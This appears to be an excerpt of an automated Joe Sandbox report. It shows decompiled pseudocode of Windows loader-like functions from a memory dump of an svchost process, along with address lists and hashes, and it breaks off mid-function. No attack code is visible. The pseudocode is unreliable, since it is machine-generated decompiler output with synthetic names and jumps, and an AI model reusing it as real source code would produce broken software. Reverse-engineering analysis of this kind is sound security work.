                                          				signed int _t204;
                                          				void* _t208;
                                          				signed int _t211;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				intOrPtr* _t218;
                                          				signed int _t226;
                                          				signed int _t239;
                                          				signed int* _t247;
                                          				signed int _t249;
                                          				void* _t252;
                                          				signed int _t256;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				signed int _t277;
                                          				signed int _t279;
                                          				intOrPtr _t283;
                                          				signed int _t287;
                                          				signed int _t288;
                                          				void* _t289;
                                          				signed char _t290;
                                          				signed int _t292;
                                          				signed int* _t293;
                                          				signed int _t306;
                                          				signed int _t307;
                                          				signed int _t308;
                                          				signed int _t309;
                                          				signed int _t310;
                                          				intOrPtr _t311;
                                          				intOrPtr _t312;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int* _t324;
                                          				signed int _t337;
                                          				signed int _t338;
                                          				signed int _t339;
                                          				signed int* _t340;
                                          				void* _t341;
                                          				signed int _t344;
                                          				signed int _t348;
                                          				signed int _t349;
                                          				signed int _t351;
                                          				intOrPtr _t353;
                                          				void* _t354;
                                          				signed int _t356;
                                          				signed int _t358;
                                          				intOrPtr _t359;
                                          				signed int _t363;
                                          				signed short* _t365;
                                          				void* _t367;
                                          				intOrPtr _t369;
                                          				void* _t370;
                                          				signed int _t371;
                                          				signed int _t372;
                                          				void* _t374;
                                          				signed int _t376;
                                          				void* _t384;
                                          				signed int _t387;
                                          
                                          				_v8 =  *0x3b1d360 ^ _t376;
                                          				_t2 =  &_a20;
                                          				 *_t2 = _a20 & 0x00000001;
                                          				_t287 = _a4;
                                          				_v200 = _a12;
                                          				_t365 = _a8;
                                          				_v212 = _a16;
                                          				_v180 = _a24;
                                          				_v168 = 0;
                                          				_v157 = 0;
                                          				if( *_t2 != 0) {
                                          					__eflags = E03A36600(0x3b152d8);
                                          					if(__eflags == 0) {
                                          						goto L1;
                                          					} else {
                                          						_v188 = 6;
                                          					}
                                          				} else {
                                          					L1:
                                          					_v188 = 9;
                                          				}
                                          				if(_t365 == 0) {
                                          					_v164 = 0;
                                          					goto L5;
                                          				} else {
                                          					_t363 =  *_t365 & 0x0000ffff;
                                          					_t341 = _t363 + 1;
                                          					if((_t365[1] & 0x0000ffff) < _t341) {
                                          						L109:
                                          						__eflags = _t341 - 0x80;
                                          						if(_t341 <= 0x80) {
                                          							_t281 =  &_v140;
                                          							_v164 =  &_v140;
                                          							goto L114;
                                          						} else {
                                          							_t283 =  *0x3b17b9c; // 0x0
                                          							_t281 = L03A44620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                          							_v164 = _t281;
                                          							__eflags = _t281;
                                          							if(_t281 != 0) {
                                          								_v157 = 1;
                                          								L114:
                                          								E03A6F3E0(_t281, _t365[2], _t363);
                                          								_t200 = _v164;
                                          								 *((char*)(_v164 + _t363)) = 0;
                                          								goto L5;
                                          							} else {
                                          								_t204 = 0xc000009a;
                                          								goto L47;
                                          							}
                                          						}
                                          					} else {
                                          						_t200 = _t365[2];
                                          						_v164 = _t200;
                                          						if( *((char*)(_t200 + _t363)) != 0) {
                                          							goto L109;
                                          						} else {
                                          							while(1) {
                                          								L5:
                                          								_t353 = 0;
                                          								_t342 = 0x1000;
                                          								_v176 = 0;
                                          								if(_t287 == 0) {
                                          									break;
                                          								}
                                          								_t384 = _t287 -  *0x3b17b90; // 0x77880000
                                          								if(_t384 == 0) {
                                          									_t353 =  *0x3b17b8c; // 0x34035e8
                                          									_v176 = _t353;
                                          									_t320 = ( *(_t353 + 0x50))[8];
                                          									_v184 = _t320;
                                          								} else {
                                          									E03A42280(_t200, 0x3b184d8);
                                          									_t277 =  *0x3b185f4; // 0x3403ad8
                                          									_t351 =  *0x3b185f8 & 1;
                                          									while(_t277 != 0) {
                                          										_t337 =  *(_t277 - 0x50);
                                          										if(_t337 > _t287) {
                                          											_t338 = _t337 | 0xffffffff;
                                          										} else {
                                          											asm("sbb ecx, ecx");
                                          											_t338 =  ~_t337;
                                          										}
                                          										_t387 = _t338;
                                          										if(_t387 < 0) {
                                          											_t339 =  *_t277;
                                          											__eflags = _t351;
                                          											if(_t351 != 0) {
                                          												__eflags = _t339;
                                          												if(_t339 == 0) {
                                          													goto L16;
                                          												} else {
                                          													goto L118;
                                          												}
                                          												goto L151;
                                          											} else {
                                          												goto L16;
                                          											}
                                          											goto L17;
                                          										} else {
                                          											if(_t387 <= 0) {
                                          												__eflags = _t277;
                                          												if(_t277 != 0) {
                                          													_t340 =  *(_t277 - 0x18);
                                          													_t24 = _t277 - 0x68; // 0x3403a70
                                          													_t353 = _t24;
                                          													_v176 = _t353;
                                          													__eflags = _t340[3] - 0xffffffff;
                                          													if(_t340[3] != 0xffffffff) {
                                          														_t279 =  *_t340;
                                          														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                          														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                          															asm("lock inc dword [edi+0x9c]");
                                          															_t340 =  *(_t353 + 0x50);
                                          														}
                                          													}
                                          													_v184 = _t340[8];
                                          												}
                                          											} else {
                                          												_t339 =  *(_t277 + 4);
                                          												if(_t351 != 0) {
                                          													__eflags = _t339;
                                          													if(_t339 == 0) {
                                          														goto L16;
                                          													} else {
                                          														L118:
                                          														_t277 = _t277 ^ _t339;
                                          														goto L17;
                                          													}
                                          													goto L151;
                                          												} else {
                                          													L16:
                                          													_t277 = _t339;
                                          												}
                                          												goto L17;
                                          											}
                                          										}
                                          										goto L25;
                                          										L17:
                                          									}
                                          									L25:
                                          									E03A3FFB0(_t287, _t353, 0x3b184d8);
                                          									_t320 = _v184;
                                          									_t342 = 0x1000;
                                          								}
                                          								if(_t353 == 0) {
                                          									break;
                                          								} else {
                                          									_t366 = 0;
                                          									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                          										_t288 = _v164;
                                          										if(_t353 != 0) {
                                          											_t342 = _t288;
                                          											_t374 = E03A7CC99(_t353, _t288, _v200, 1,  &_v168);
                                          											if(_t374 >= 0) {
                                          												if(_v184 == 7) {
                                          													__eflags = _a20;
                                          													if(__eflags == 0) {
                                          														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                          														if(__eflags != 0) {
                                          															_t271 = E03A36600(0x3b152d8);
                                          															__eflags = _t271;
                                          															if(__eflags == 0) {
                                          																_t342 = 0;
                                          																_v169 = _t271;
                                          																_t374 = E03A37926( *(_t353 + 0x50), 0,  &_v169);
                                          															}
                                          														}
                                          													}
                                          												}
                                          												if(_t374 < 0) {
                                          													_v168 = 0;
                                          												} else {
                                          													if( *0x3b1b239 != 0) {
                                          														_t342 =  *(_t353 + 0x18);
                                          														E03AAE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                          													}
                                          													if( *0x3b18472 != 0) {
                                          														_v192 = 0;
                                          														_t342 =  *0x7ffe0330;
                                          														asm("ror edi, cl");
                                          														 *0x3b1b1e0( &_v192, _t353, _v168, 0, _v180);
                                          														 *( *0x3b1b218 ^  *0x7ffe0330)();
                                          														_t269 = _v192;
                                          														_t353 = _v176;
                                          														__eflags = _t269;
                                          														if(__eflags != 0) {
                                          															_v168 = _t269;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                          												_t366 = 0xc000007a;
                                          											}
                                          											_t247 =  *(_t353 + 0x50);
                                          											if(_t247[3] == 0xffffffff) {
                                          												L40:
                                          												if(_t366 == 0xc000007a) {
                                          													__eflags = _t288;
                                          													if(_t288 == 0) {
                                          														goto L136;
                                          													} else {
                                          														_t366 = 0xc0000139;
                                          													}
                                          													goto L54;
                                          												}
                                          											} else {
                                          												_t249 =  *_t247;
                                          												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                          													goto L40;
                                          												} else {
                                          													_t250 = _t249 | 0xffffffff;
                                          													asm("lock xadd [edi+0x9c], eax");
                                          													if((_t249 | 0xffffffff) == 0) {
                                          														E03A42280(_t250, 0x3b184d8);
                                          														_t342 =  *(_t353 + 0x54);
                                          														_t165 = _t353 + 0x54; // 0x54
                                          														_t252 = _t165;
                                          														__eflags =  *(_t342 + 4) - _t252;
                                          														if( *(_t342 + 4) != _t252) {
                                          															L135:
                                          															asm("int 0x29");
                                          															L136:
                                          															_t288 = _v200;
                                          															_t366 = 0xc0000138;
                                          															L54:
                                          															_t342 = _t288;
                                          															L03A63898(0, _t288, _t366);
                                          														} else {
                                          															_t324 =  *(_t252 + 4);
                                          															__eflags =  *_t324 - _t252;
                                          															if( *_t324 != _t252) {
                                          																goto L135;
                                          															} else {
                                          																 *_t324 = _t342;
                                          																 *(_t342 + 4) = _t324;
                                          																_t293 =  *(_t353 + 0x50);
                                          																_v180 =  *_t293;
                                          																E03A3FFB0(_t293, _t353, 0x3b184d8);
                                          																__eflags =  *((short*)(_t353 + 0x3a));
                                          																if( *((short*)(_t353 + 0x3a)) != 0) {
                                          																	_t342 = 0;
                                          																	__eflags = 0;
                                          																	E03A637F5(_t353, 0);
                                          																}
                                          																E03A60413(_t353);
                                          																_t256 =  *(_t353 + 0x48);
                                          																__eflags = _t256;
                                          																if(_t256 != 0) {
                                          																	__eflags = _t256 - 0xffffffff;
                                          																	if(_t256 != 0xffffffff) {
                                          																		E03A59B10(_t256);
                                          																	}
                                          																}
                                          																__eflags =  *(_t353 + 0x28);
                                          																if( *(_t353 + 0x28) != 0) {
                                          																	_t174 = _t353 + 0x24; // 0x24
                                          																	E03A502D6(_t174);
                                          																}
                                          																L03A477F0( *0x3b17b98, 0, _t353);
                                          																__eflags = _v180 - _t293;
                                          																if(__eflags == 0) {
                                          																	E03A5C277(_t293, _t366);
                                          																}
                                          																_t288 = _v164;
                                          																goto L40;
                                          															}
                                          														}
                                          													} else {
                                          														goto L40;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										L03A3EC7F(_t353);
                                          										L03A519B8(_t287, 0, _t353, 0);
                                          										_t200 = E03A2F4E3(__eflags);
                                          										continue;
                                          									}
                                          								}
                                          								L41:
                                          								if(_v157 != 0) {
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                          								}
                                          								if(_t366 < 0 || ( *0x3b1b2f8 |  *0x3b1b2fc) == 0 || ( *0x3b1b2e4 & 0x00000001) != 0) {
                                          									L46:
                                          									 *_v212 = _v168;
                                          									_t204 = _t366;
                                          									L47:
                                          									_pop(_t354);
                                          									_pop(_t367);
                                          									_pop(_t289);
                                          									return E03A6B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                          								} else {
                                          									_v200 = 0;
                                          									if(( *0x3b1b2ec >> 0x00000008 & 0x00000003) == 3) {
                                          										_t355 = _v168;
                                          										_t342 =  &_v208;
                                          										_t208 = E03AD6B68(_v168,  &_v208, _v168, __eflags);
                                          										__eflags = _t208 - 1;
                                          										if(_t208 == 1) {
                                          											goto L46;
                                          										} else {
                                          											__eflags = _v208 & 0x00000010;
                                          											if((_v208 & 0x00000010) == 0) {
                                          												goto L46;
                                          											} else {
                                          												_t342 = 4;
                                          												_t366 = E03AD6AEB(_t355, 4,  &_v216);
                                          												__eflags = _t366;
                                          												if(_t366 >= 0) {
                                          													goto L46;
                                          												} else {
                                          													asm("int 0x29");
                                          													_t356 = 0;
                                          													_v44 = 0;
                                          													_t290 = _v52;
                                          													__eflags = 0;
                                          													if(0 == 0) {
                                          														L108:
                                          														_t356 = 0;
                                          														_v44 = 0;
                                          														goto L63;
                                          													} else {
                                          														__eflags = 0;
                                          														if(0 < 0) {
                                          															goto L108;
                                          														}
                                          														L63:
                                          														_v112 = _t356;
                                          														__eflags = _t356;
                                          														if(_t356 == 0) {
                                          															L143:
                                          															_v8 = 0xfffffffe;
                                          															_t211 = 0xc0000089;
                                          														} else {
                                          															_v36 = 0;
                                          															_v60 = 0;
                                          															_v48 = 0;
                                          															_v68 = 0;
                                          															_v44 = _t290 & 0xfffffffc;
                                          															E03A3E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                          															_t306 = _v68;
                                          															__eflags = _t306;
                                          															if(_t306 == 0) {
                                          																_t216 = 0xc000007b;
                                          																_v36 = 0xc000007b;
                                          																_t307 = _v60;
                                          															} else {
                                          																__eflags = _t290 & 0x00000001;
                                          																if(__eflags == 0) {
                                          																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                          																	__eflags = _t349 - 0x10b;
                                          																	if(_t349 != 0x10b) {
                                          																		__eflags = _t349 - 0x20b;
                                          																		if(_t349 == 0x20b) {
                                          																			goto L102;
                                          																		} else {
                                          																			_t307 = 0;
                                          																			_v48 = 0;
                                          																			_t216 = 0xc000007b;
                                          																			_v36 = 0xc000007b;
                                          																			goto L71;
                                          																		}
                                          																	} else {
                                          																		L102:
                                          																		_t307 =  *(_t306 + 0x50);
                                          																		goto L69;
                                          																	}
                                          																	goto L151;
                                          																} else {
                                          																	_t239 = L03A3EAEA(_t290, _t290, _t356, _t366, __eflags);
                                          																	_t307 = _t239;
                                          																	_v60 = _t307;
                                          																	_v48 = _t307;
                                          																	__eflags = _t307;
                                          																	if(_t307 != 0) {
                                          																		L70:
                                          																		_t216 = _v36;
                                          																	} else {
                                          																		_push(_t239);
                                          																		_push(0x14);
                                          																		_push( &_v144);
                                          																		_push(3);
                                          																		_push(_v44);
                                          																		_push(0xffffffff);
                                          																		_t319 = E03A69730();
                                          																		_v36 = _t319;
                                          																		__eflags = _t319;
                                          																		if(_t319 < 0) {
                                          																			_t216 = 0xc000001f;
                                          																			_v36 = 0xc000001f;
                                          																			_t307 = _v60;
                                          																		} else {
                                          																			_t307 = _v132;
                                          																			L69:
                                          																			_v48 = _t307;
                                          																			goto L70;
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															L71:
                                          															_v72 = _t307;
                                          															_v84 = _t216;
                                          															__eflags = _t216 - 0xc000007b;
                                          															if(_t216 == 0xc000007b) {
                                          																L150:
                                          																_v8 = 0xfffffffe;
                                          																_t211 = 0xc000007b;
                                          															} else {
                                          																_t344 = _t290 & 0xfffffffc;
                                          																_v76 = _t344;
                                          																__eflags = _v40 - _t344;
                                          																if(_v40 <= _t344) {
                                          																	goto L150;
                                          																} else {
                                          																	__eflags = _t307;
                                          																	if(_t307 == 0) {
                                          																		L75:
                                          																		_t217 = 0;
                                          																		_v104 = 0;
                                          																		__eflags = _t366;
                                          																		if(_t366 != 0) {
                                          																			__eflags = _t290 & 0x00000001;
                                          																			if((_t290 & 0x00000001) != 0) {
                                          																				_t217 = 1;
                                          																				_v104 = 1;
                                          																			}
                                          																			_t290 = _v44;
                                          																			_v52 = _t290;
                                          																		}
                                          																		__eflags = _t217 - 1;
                                          																		if(_t217 != 1) {
                                          																			_t369 = 0;
                                          																			_t218 = _v40;
                                          																			goto L91;
                                          																		} else {
                                          																			_v64 = 0;
                                          																			E03A3E9C0(1, _t290, 0, 0,  &_v64);
                                          																			_t309 = _v64;
                                          																			_v108 = _t309;
                                          																			__eflags = _t309;
                                          																			if(_t309 == 0) {
                                          																				goto L143;
                                          																			} else {
                                          																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                          																				__eflags = _t226 - 0x10b;
                                          																				if(_t226 != 0x10b) {
                                          																					__eflags = _t226 - 0x20b;
                                          																					if(_t226 != 0x20b) {
                                          																						goto L143;
                                          																					} else {
                                          																						_t371 =  *(_t309 + 0x98);
                                          																						goto L83;
                                          																					}
                                          																				} else {
                                          																					_t371 =  *(_t309 + 0x88);
                                          																					L83:
                                          																					__eflags = _t371;
                                          																					if(_t371 != 0) {
                                          																						_v80 = _t371 - _t356 + _t290;
                                          																						_t310 = _v64;
                                          																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                          																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                          																						_t311 = 0;
                                          																						__eflags = 0;
                                          																						while(1) {
                                          																							_v120 = _t311;
                                          																							_v116 = _t348;
                                          																							__eflags = _t311 - _t292;
                                          																							if(_t311 >= _t292) {
                                          																								goto L143;
                                          																							}
                                          																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                          																							__eflags = _t371 - _t359;
                                          																							if(_t371 < _t359) {
                                          																								L98:
                                          																								_t348 = _t348 + 0x28;
                                          																								_t311 = _t311 + 1;
                                          																								continue;
                                          																							} else {
                                          																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                          																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                          																									goto L98;
                                          																								} else {
                                          																									__eflags = _t348;
                                          																									if(_t348 == 0) {
                                          																										goto L143;
                                          																									} else {
                                          																										_t218 = _v40;
                                          																										_t312 =  *_t218;
                                          																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                          																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                          																											_v100 = _t359;
                                          																											_t360 = _v108;
                                          																											_t372 = L03A38F44(_v108, _t312);
                                          																											__eflags = _t372;
                                          																											if(_t372 == 0) {
                                          																												goto L143;
                                          																											} else {
                                          																												_t290 = _v52;
                                          																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03A63C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                          																												_t307 = _v72;
                                          																												_t344 = _v76;
                                          																												_t218 = _v40;
                                          																												goto L91;
                                          																											}
                                          																										} else {
                                          																											_t290 = _v52;
                                          																											_t307 = _v72;
                                          																											_t344 = _v76;
                                          																											_t369 = _v80;
                                          																											L91:
                                          																											_t358 = _a4;
                                          																											__eflags = _t358;
                                          																											if(_t358 == 0) {
                                          																												L95:
                                          																												_t308 = _a8;
                                          																												__eflags = _t308;
                                          																												if(_t308 != 0) {
                                          																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                          																												}
                                          																												_v8 = 0xfffffffe;
                                          																												_t211 = _v84;
                                          																											} else {
                                          																												_t370 =  *_t218 - _t369 + _t290;
                                          																												 *_t358 = _t370;
                                          																												__eflags = _t370 - _t344;
                                          																												if(_t370 <= _t344) {
                                          																													L149:
                                          																													 *_t358 = 0;
                                          																													goto L150;
                                          																												} else {
                                          																													__eflags = _t307;
                                          																													if(_t307 == 0) {
                                          																														goto L95;
                                          																													} else {
                                          																														__eflags = _t370 - _t344 + _t307;
                                          																														if(_t370 >= _t344 + _t307) {
                                          																															goto L149;
                                          																														} else {
                                          																															goto L95;
                                          																														}
                                          																													}
                                          																												}
                                          																											}
                                          																										}
                                          																									}
                                          																								}
                                          																							}
                                          																							goto L97;
                                          																						}
                                          																					}
                                          																					goto L143;
                                          																				}
                                          																			}
                                          																		}
                                          																	} else {
                                          																		__eflags = _v40 - _t307 + _t344;
                                          																		if(_v40 >= _t307 + _t344) {
                                          																			goto L150;
                                          																		} else {
                                          																			goto L75;
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          														}
                                          														L97:
                                          														 *[fs:0x0] = _v20;
                                          														return _t211;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										goto L46;
                                          									}
                                          								}
                                          								goto L151;
                                          							}
                                          							_t288 = _v164;
                                          							_t366 = 0xc0000135;
                                          							goto L41;
                                          						}
                                          					}
                                          				}
                                          				L151:
                                          			}
                                          0x03a3d824
                                          0x03a3d831
                                          0x03a8b4a5
                                          0x03a8b4ab
                                          0x03a8b4b3
                                          0x03a8b4b8
                                          0x03a8b4bb
                                          0x00000000
                                          0x03a8b4c1
                                          0x03a8b4c1
                                          0x03a8b4c8
                                          0x00000000
                                          0x03a8b4ce
                                          0x03a8b4d4
                                          0x03a8b4e1
                                          0x03a8b4e3
                                          0x03a8b4e5
                                          0x00000000
                                          0x03a8b4eb
                                          0x03a8b4f0
                                          0x03a8b4f2
                                          0x03a3dac9
                                          0x03a3dacc
                                          0x03a3dacf
                                          0x03a3dad1
                                          0x03a3dd78
                                          0x03a3dd78
                                          0x03a3dcf2
                                          0x00000000
                                          0x03a3dad7
                                          0x03a3dad9
                                          0x03a3dadb
                                          0x00000000
                                          0x00000000
                                          0x03a3dae1
                                          0x03a3dae1
                                          0x03a3dae4
                                          0x03a3dae6
                                          0x03a8b4f9
                                          0x03a8b4f9
                                          0x03a8b500
                                          0x03a3daec
                                          0x03a3daec
                                          0x03a3daf5
                                          0x03a3daf8
                                          0x03a3dafb
                                          0x03a3db03
                                          0x03a3db11
                                          0x03a3db16
                                          0x03a3db19
                                          0x03a3db1b
                                          0x03a8b52c
                                          0x03a8b531
                                          0x03a8b534
                                          0x03a3db21
                                          0x03a3db21
                                          0x03a3db24
                                          0x03a3dcd9
                                          0x03a3dce2
                                          0x03a3dce5
                                          0x03a3dd6a
                                          0x03a3dd6d
                                          0x00000000
                                          0x03a3dd73
                                          0x03a8b51a
                                          0x03a8b51c
                                          0x03a8b51f
                                          0x03a8b524
                                          0x00000000
                                          0x03a8b524
                                          0x03a3dce7
                                          0x03a3dce7
                                          0x03a3dce7
                                          0x00000000
                                          0x03a3dce7
                                          0x00000000
                                          0x03a3db2a
                                          0x03a3db2c
                                          0x03a3db31
                                          0x03a3db33
                                          0x03a3db36
                                          0x03a3db39
                                          0x03a3db3b
                                          0x03a3db66
                                          0x03a3db66
                                          0x03a3db3d
                                          0x03a3db3d
                                          0x03a3db3e
                                          0x03a3db46
                                          0x03a3db47
                                          0x03a3db49
                                          0x03a3db4c
                                          0x03a3db53
                                          0x03a3db55
                                          0x03a3db58
                                          0x03a3db5a
                                          0x03a8b50a
                                          0x03a8b50f
                                          0x03a8b512
                                          0x03a3db60
                                          0x03a3db60
                                          0x03a3db63
                                          0x03a3db63
                                          0x00000000
                                          0x03a3db63
                                          0x03a3db5a
                                          0x03a3db3b
                                          0x03a3db24
                                          0x03a3db69
                                          0x03a3db69
                                          0x03a3db6c
                                          0x03a3db6f
                                          0x03a3db74
                                          0x03a8b557
                                          0x03a8b557
                                          0x03a8b55e
                                          0x03a3db7a
                                          0x03a3db7c
                                          0x03a3db7f
                                          0x03a3db82
                                          0x03a3db85
                                          0x00000000
                                          0x03a3db8b
                                          0x03a3db8b
                                          0x03a3db8d
                                          0x03a3db9b
                                          0x03a3db9b
                                          0x03a3db9d
                                          0x03a3dba0
                                          0x03a3dba2
                                          0x03a3dba4
                                          0x03a3dba7
                                          0x03a3dba9
                                          0x03a3dbae
                                          0x03a3dbae
                                          0x03a3dbb1
                                          0x03a3dbb4
                                          0x03a3dbb4
                                          0x03a3dbb7
                                          0x03a3dbba
                                          0x03a3dcd2
                                          0x03a3dcd4
                                          0x00000000
                                          0x03a3dbc0
                                          0x03a3dbc0
                                          0x03a3dbd2
                                          0x03a3dbd7
                                          0x03a3dbda
                                          0x03a3dbdd
                                          0x03a3dbdf
                                          0x00000000
                                          0x03a3dbe5
                                          0x03a3dbe5
                                          0x03a3dbee
                                          0x03a3dbf1
                                          0x03a8b541
                                          0x03a8b544
                                          0x00000000
                                          0x03a8b546
                                          0x03a8b546
                                          0x00000000
                                          0x03a8b546
                                          0x03a3dbf7
                                          0x03a3dbf7
                                          0x03a3dbfd
                                          0x03a3dbfd
                                          0x03a3dbff
                                          0x03a3dc0b
                                          0x03a3dc15
                                          0x03a3dc1b
                                          0x03a3dc1d
                                          0x03a3dc21
                                          0x03a3dc21
                                          0x03a3dc23
                                          0x03a3dc23
                                          0x03a3dc26
                                          0x03a3dc29
                                          0x03a3dc2b
                                          0x00000000
                                          0x00000000
                                          0x03a3dc31
                                          0x03a3dc34
                                          0x03a3dc36
                                          0x03a3dcbf
                                          0x03a3dcbf
                                          0x03a3dcc2
                                          0x00000000
                                          0x03a3dc3c
                                          0x03a3dc41
                                          0x03a3dc43
                                          0x00000000
                                          0x03a3dc45
                                          0x03a3dc45
                                          0x03a3dc47
                                          0x00000000
                                          0x03a3dc4d
                                          0x03a3dc4d
                                          0x03a3dc50
                                          0x03a3dc52
                                          0x03a3dc55
                                          0x03a3dcfa
                                          0x03a3dcfe
                                          0x03a3dd08
                                          0x03a3dd0a
                                          0x03a3dd0c
                                          0x00000000
                                          0x03a3dd12
                                          0x03a3dd15
                                          0x03a3dd2d
                                          0x03a3dd2f
                                          0x03a3dd32
                                          0x03a3dd35
                                          0x00000000
                                          0x03a3dd35
                                          0x03a3dc5b
                                          0x03a3dc5b
                                          0x03a3dc5e
                                          0x03a3dc61
                                          0x03a3dc64
                                          0x03a3dc67
                                          0x03a3dc67
                                          0x03a3dc6a
                                          0x03a3dc6c
                                          0x03a3dc8e
                                          0x03a3dc8e
                                          0x03a3dc91
                                          0x03a3dc93
                                          0x03a3dcce
                                          0x03a3dcce
                                          0x03a3dc95
                                          0x03a3dc9c
                                          0x03a3dc6e
                                          0x03a3dc72
                                          0x03a3dc75
                                          0x03a3dc77
                                          0x03a3dc79
                                          0x03a8b551
                                          0x03a8b551
                                          0x00000000
                                          0x03a3dc7f
                                          0x03a3dc7f
                                          0x03a3dc81
                                          0x00000000
                                          0x03a3dc83
                                          0x03a3dc86
                                          0x03a3dc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3dc88
                                          0x03a3dc81
                                          0x03a3dc79
                                          0x03a3dc6c
                                          0x03a3dc55
                                          0x03a3dc47
                                          0x03a3dc43
                                          0x00000000
                                          0x03a3dc36
                                          0x03a3dc23
                                          0x00000000
                                          0x03a3dbff
                                          0x03a3dbf1
                                          0x03a3dbdf
                                          0x03a3db8f
                                          0x03a3db92
                                          0x03a3db95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3db95
                                          0x03a3db8d
                                          0x03a3db85
                                          0x03a3db74
                                          0x03a3dc9f
                                          0x03a3dca2
                                          0x03a3dcb0
                                          0x03a3dcb0
                                          0x03a3dad1
                                          0x03a8b4e5
                                          0x03a8b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a3d831
                                          0x00000000
                                          0x03a3d800
                                          0x03a8b47f
                                          0x03a8b485
                                          0x00000000
                                          0x03a8b485
                                          0x03a3d665
                                          0x03a3d652
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c7551d730b0312878ab4159cb8ae20e11ff59b68bc0fb6e9a5d54b4b98af0bdf
                                          • Instruction ID: ab0e48d0aeef6bcb3a08b4e60fc8b3e42ba4e6732515f21576754c13bcaec8bf
                                          • Opcode Fuzzy Hash: c7551d730b0312878ab4159cb8ae20e11ff59b68bc0fb6e9a5d54b4b98af0bdf
                                          • Instruction Fuzzy Hash: B1E1B174A00359CFDB24EF14C984B69B7B6BF86304F0801EFE8199B690D774A985CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E03A3849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                          				void* _t136;
                                          				signed int _t139;
                                          				signed int _t141;
                                          				signed int _t145;
                                          				intOrPtr _t146;
                                          				signed int _t149;
                                          				signed int _t150;
                                          				signed int _t161;
                                          				signed int _t163;
                                          				signed int _t165;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				signed int _t194;
                                          				signed int _t200;
                                          				void* _t201;
                                          				signed int _t204;
                                          				signed int _t206;
                                          				signed int _t210;
                                          				signed int _t214;
                                          				signed int _t215;
                                          				signed int _t218;
                                          				void* _t221;
                                          				signed int _t224;
                                          				signed int _t226;
                                          				intOrPtr _t228;
                                          				signed int _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				void* _t237;
                                          				void* _t238;
                                          
                                          				_t236 = __esi;
                                          				_t235 = __edi;
                                          				_t193 = __ebx;
                                          				_push(0x70);
                                          				_push(0x3aff9c0);
                                          				E03A7D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                          				if( *0x3b17b04 == 0) {
                                          					L4:
                                          					goto L5;
                                          				} else {
                                          					_t136 = E03A3CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                          					_t236 = 0;
                                          					if(_t136 < 0) {
                                          						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                          					}
                                          					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                          						_t193 =  *( *[fs:0x30] + 0x18);
                                          						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                          						 *(_t237 - 0x68) = _t236;
                                          						 *(_t237 - 0x6c) = _t236;
                                          						_t235 = _t236;
                                          						 *(_t237 - 0x60) = _t236;
                                          						E03A42280( *[fs:0x30], 0x3b18550);
                                          						_t139 =  *0x3b17b04; // 0x1
                                          						__eflags = _t139 - 1;
                                          						if(__eflags != 0) {
                                          							_t200 = 0xc;
                                          							_t201 = _t237 - 0x40;
                                          							_t141 = E03A5F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                          							 *(_t237 - 0x44) = _t141;
                                          							__eflags = _t141;
                                          							if(_t141 < 0) {
                                          								L50:
                                          								E03A3FFB0(_t193, _t235, 0x3b18550);
                                          								L5:
                                          								return E03A7D130(_t193, _t235, _t236);
                                          							}
                                          							_push(_t201);
                                          							_t221 = 0x10;
                                          							_t202 =  *(_t237 - 0x40);
                                          							_t145 = E03A21C45( *(_t237 - 0x40), _t221);
                                          							 *(_t237 - 0x44) = _t145;
                                          							__eflags = _t145;
                                          							if(_t145 < 0) {
